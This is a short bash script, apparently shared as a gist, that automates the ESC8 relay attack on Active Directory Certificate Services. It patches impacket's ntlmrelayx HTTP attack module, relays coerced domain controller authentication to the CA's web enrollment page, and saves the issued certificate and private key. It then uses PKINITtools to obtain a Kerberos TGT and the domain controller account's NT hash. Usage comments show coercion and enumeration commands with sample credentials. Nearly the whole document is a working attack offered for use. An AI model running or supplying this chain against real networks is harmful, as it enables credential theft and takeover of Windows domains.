Automate the process of exploiting ESC8 with PKINITtools

ADCS_ESC8_PKINITtools.sh

: << 'comment'
Usage:

$ git clone https://github.com/dirkjanm/PKINITtools && cd PKINITtools
$ cme ldap megacorp.local -u snovvcrash -p 'Passw0rd!' -M adcs
$ bash ADCS_ESC8_PKINITtools.sh CA01.megacorp.local DA01 KerberosAuthentication
$ python dementor.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local 10.10.13.37 DC1.megacorp.local
comment

CA_FQDN=$1
DA=$2
TEMPLATE=$3
DOMAIN="${CA_FQDN#*.}"
CA="${CA_FQDN%%.*}"
HTTPATTACK_PATH=`python3 -vc 'import impacket' 2>&1 | grep impacket | grep matches | awk '{print $4}' | rev | cut -d/ -f2- | rev`/examples/ntlmrelayx/attacks/httpattack.py

cp ntlmrelayx/httpattack.py ntlmrelayx/httpattack.py.bak
sed -i "s/testsegment.local/${DOMAIN}/g" ntlmrelayx/httpattack.py
sed -i "s/DomainController/${TEMPLATE}/g" ntlmrelayx/httpattack.py

sudo cp ${HTTPATTACK_PATH} ${HTTPATTACK_PATH}.bak
sudo cp ntlmrelayx/httpattack.py ${HTTPATTACK_PATH}

ntlmrelayx.py -t http://${CA_FQDN}/certsrv/certfnsh.asp -smb2support --no-wcf-server | tee ntlmrelayx.out
sed -n '/-----BEGIN CERTIFICATE-----/,/-----END CERTIFICATE-----/p' ntlmrelayx.out > cert.pem
sed -n '/-----BEGIN RSA PRIVATE KEY-----/,/-----END RSA PRIVATE KEY-----/p' ntlmrelayx.out > privatekey.pem

sleep 15

python3 gettgtpkinit.py ${DOMAIN}/${DA}'$' -cert-pem cert.pem -key-pem privatekey.pem ${CA}.ccache | tee gettgtpkinit.out
KEY=`grep -e "[0-9a-f]\{64\}" gettgtpkinit.out`
KRB5CCNAME=${CA}.ccache python3 getnthash.py ${DOMAIN}/${DA}'$' -key ${KEY}

#rm ntlmrelayx.out cert.pem privatekey.pem gettgtpkinit.out
sudo mv ${HTTPATTACK_PATH}.bak ${HTTPATTACK_PATH}
mv ntlmrelayx/httpattack.py.bak ntlmrelayx/httpattack.py